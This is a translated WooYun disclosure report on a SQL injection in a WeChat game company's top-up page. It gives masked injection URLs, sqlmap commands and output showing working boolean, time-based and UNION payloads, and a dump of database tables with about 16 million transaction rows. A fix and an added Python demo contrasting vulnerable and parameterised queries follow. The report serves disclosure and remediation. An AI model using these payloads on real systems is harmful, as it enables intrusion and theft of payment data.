Vulnerability summary

Defect ID: wooyun-2016-0203207

Title: SQL injection (UNION-capable) in 游光网络's 爱微游 platform leaks 16 million transaction records

Vendor: 游光网络

Author: 我在不想理你

Submitted: 2016-05-02 10:20

Fixed: 2016-06-20 19:40

Published: 2016-06-20 19:40

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2016-05-02: details sent to the vendor, awaiting vendor response
2016-05-06: vendor confirmed; details disclosed to the vendor only
2016-05-16: details disclosed to core white hats and domain experts
2016-05-26: details disclosed to regular white hats
2016-06-05: details disclosed to intern white hats
2016-06-20: details disclosed to the public

Brief description:

As titled.

Detailed description:

http://**.**.**.**/


游光网络 is a fairly popular developer of WeChat games; players can log in with WeChat without registering. Its currently popular titles, 怪兽必须死, 勇士之塔 and 三国浮生记, all allow top-ups paid directly through WeChat. I looked at the transaction records: there are 7 or 8 top-up records every second, and although each is small (2 or 5 yuan), the revenue total over a day is still considerable.
The injection point is the product_id parameter of the web top-up page:

http://**.**.**.**/pay/alipay2/
mask region
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8


Run it through sqlmap:

sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'
[sqlmap banner] {**.**.**.**#dev} http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:46:06
[20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:46:08] [INFO] resuming back-end DBMS 'mysql'
[20:46:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:46:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12

Proof of vulnerability:

Database:

sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count
[*] starting at 20:47:00
[20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:47:01] [INFO] resuming back-end DBMS 'mysql'
[20:47:01] [INFO] testing connection to the target URL
[20:47:01] [INFO] fetching tables for database: 'money'
[20:47:01] [INFO] the SQL query used returns 19 entries
[20:47:01] [INFO] resumed: channel_tradeno
[20:47:01] [INFO] resumed: cp_trans
[20:47:01] [INFO] resumed: distr_stat
[20:47:01] [INFO] resumed: distr_sum
[20:47:01] [INFO] resumed: game_v2
[20:47:01] [INFO] resumed: marchant
[20:47:01] [INFO] resumed: mch_func_priv
[20:47:01] [INFO] resumed: mch_games
[20:47:01] [INFO] resumed: mch_priv
[20:47:01] [INFO] resumed: online
[20:47:01] [INFO] resumed: product_sum
[20:47:01] [INFO] resumed: product_v2
[20:47:01] [INFO] resumed: register
[20:47:01] [INFO] resumed: sum
[20:47:01] [INFO] resumed: talking_data_result
[20:47:01] [INFO] resumed: trans
[20:47:01] [INFO] resumed: trans_back
[20:47:01] [INFO] resumed: user_channel_sum
[20:47:01] [INFO] resumed: user_channel_trans
Database: money
[19 tables]
+---------------------+
| sum                 |
| channel_tradeno     |
| cp_trans            |
| distr_stat          |
| distr_sum           |
| game_v2             |
| marchant            |
| mch_func_priv       |
| mch_games           |
| mch_priv            |
| online              |
| product_sum         |
| product_v2          |
| register            |
| talking_data_result |
| trans               |
| trans_back          |
| user_channel_sum    |
| user_channel_trans  |
+---------------------+
[20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: money
+---------------------+----------+
| Table               | Entries  |
+---------------------+----------+
| trans               | 16486615 |
| trans_back          | 14759999 |
| online              | 7397218  |
| cp_trans            | 113319   |
| product_sum         | 27005    |
| `sum`               | 15403    |
| talking_data_result | 11257    |
| user_channel_sum    | 3924     |
| distr_sum           | 2431     |
| channel_tradeno     | 1776     |
| product_v2          | 687      |
| distr_stat          | 571      |
| mch_games           | 150      |
| game_v2             | 89       |
| marchant            | 78       |
| register            | 45       |
| mch_priv            | 5        |
| mch_func_priv       | 1        |
+---------------------+----------+


16 million transaction records (the trans table alone holds 16,486,615 rows)

Fix:

Filter the input: product_id should be validated as an integer and passed to the database as a bound parameter, not concatenated into the query string.
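The following is an added example, not code from the report or from 游光网络. It stands in for the /pay/alipay2/ product lookup to show why the `product_id=1 or 8=8` test and the 3-column UNION payload sqlmap reported succeed against a string-built query, and how the integer-validate-then-bind fix stops both. The real handler is not on the page, so the table name, columns, sample rows and the use of SQLite in place of MySQL are all assumptions; MySQL's CONCAT()/0x hex literals from sqlmap's payload are decoded in Python and passed as a plain string literal, and the hex blobs themselves are copied from the payload shown above.

```python
"""Added example: vulnerable vs. hardened product lookup modelled on the
report's product_id injection.  Table/column names, sample rows and the
SQLite stand-in for MySQL are assumptions, not details from the page."""
import sqlite3

# Constructed sample rows for an assumed product table (names/prices made up).
PRODUCTS = [(1, "100 coins", 2.0), (2, "300 coins", 5.0), (3, "1000 coins", 15.0)]

# The three hex blobs from the page's UNION payload.  sqlmap wraps the value
# it extracts in a random prefix/suffix so it can locate it in the response.
HEX_PREFIX = "717a7a7071"
HEX_VALUE = ("4978706a5555576761676c5362744f51736a417a"
             "59584c594a59524749636441446e784c64546671")
HEX_SUFFIX = "717a627671"


def hex_to_str(h):
    """Decode one of sqlmap's 0x... literals to the ASCII string it encodes."""
    return bytes.fromhex(h).decode("ascii")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product_v2 (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO product_v2 VALUES (?, ?, ?)", PRODUCTS)
    return conn


def lookup_vulnerable(conn, product_id):
    """The bug: the parameter is concatenated, so it becomes SQL text."""
    sql = "SELECT id, name, price FROM product_v2 WHERE id = " + product_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, product_id):
    """The fix: reject anything that is not a bare integer, then bind it."""
    try:
        pid = int(product_id)
    except ValueError:
        return None  # caller answers 400; nothing reaches the database
    return conn.execute(
        "SELECT id, name, price FROM product_v2 WHERE id = ?", (pid,)
    ).fetchall()


def boolean_oracle(conn):
    """sqlmap's boolean-based test on the page's tainted base value.
    AND binds tighter than OR, so `1 or 8=8 AND <true>` matches every row
    while `1 or 8=8 AND <false>` matches only id 1: a one-bit oracle."""
    true_rows = lookup_vulnerable(conn, "1 or 8=8 AND 9197=9197")
    false_rows = lookup_vulnerable(conn, "1 or 8=8 AND 9197=9198")
    return len(true_rows), len(false_rows)


def union_exfiltrate(conn):
    """sqlmap's UNION payload: id=-2170 matches nothing, the UNION supplies a
    row with the 3 columns sqlmap found, and the marked value comes back in
    the first column.  Returns the value found between the markers."""
    prefix, suffix = hex_to_str(HEX_PREFIX), hex_to_str(HEX_SUFFIX)
    marked = prefix + hex_to_str(HEX_VALUE) + suffix
    payload = "-2170 UNION ALL SELECT '" + marked + "',NULL,NULL-- -"
    cell = lookup_vulnerable(conn, payload)[0][0]
    start = cell.index(prefix) + len(prefix)
    return cell[start:cell.index(suffix)]


def hardened_blocks_both(conn):
    """True when the hardened lookup rejects both payloads yet still serves id 1."""
    union = "-2170 UNION ALL SELECT 'x',NULL,NULL-- -"
    return (lookup_hardened(conn, "1 or 8=8") is None
            and lookup_hardened(conn, union) is None
            and len(lookup_hardened(conn, "1")) == 1)


if __name__ == "__main__":
    db = make_db()
    print("id=1 rows:", len(lookup_vulnerable(db, "1")))
    print("id=1 or 8=8 rows:", len(lookup_vulnerable(db, "1 or 8=8")))
    print("boolean oracle (true, false):", boolean_oracle(db))
    print("UNION returned:", union_exfiltrate(db))
    print("hardened blocks both, serves id=1:", hardened_blocks_both(db))
```

The decoded markers are `qzzpq` and `qzbvq`; the UNION succeeds only because the injected SELECT has exactly as many columns as the original query, which is what sqlmap's "Generic UNION query (NULL) - 3 columns" line records. Casting to int before binding also preserves the behaviour for legitimate numeric IDs, so the fix needs no changes elsewhere in the page's logic.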

Copyright notice: when reposting, please credit the source: 我在不想理你@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-05-06 19:37

Vendor reply:

CNVD has not directly confirmed the described situation; CNVD has notified the website's operating organization through the publicly listed contact details.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-05-02 10:44 | sauce ( Regular white hat | Rank:285 Vulnerabilities:46 | Programming for RMB)

    You're incorrigible

  2. 2016-05-02 14:18 | 我在不想理你 ( Regular white hat | Rank:186 Vulnerabilities:60 | Life is a long road)

    @sauce First time making the headline

  3. 2016-05-02 15:52 | Exploit DB ( Regular white hat | Rank:699 Vulnerabilities:156 | Water can carry a boat, or capsize it.)

    Heh, the reporter is welcome to join one of my discussion groups to talk it over.

  4. 2016-05-02 16:10 | Freebug ( Regular white hat | Rank:110 Vulnerabilities:39 | Hooliganism is a noble profession!)

    Quickly leaving my name

  5. 2016-05-02 17:55 | hear7v ( Regular white hat | Rank:175 Vulnerabilities:26 | Looking for an organization to take me in)

    @我在不想理你 So this is where you were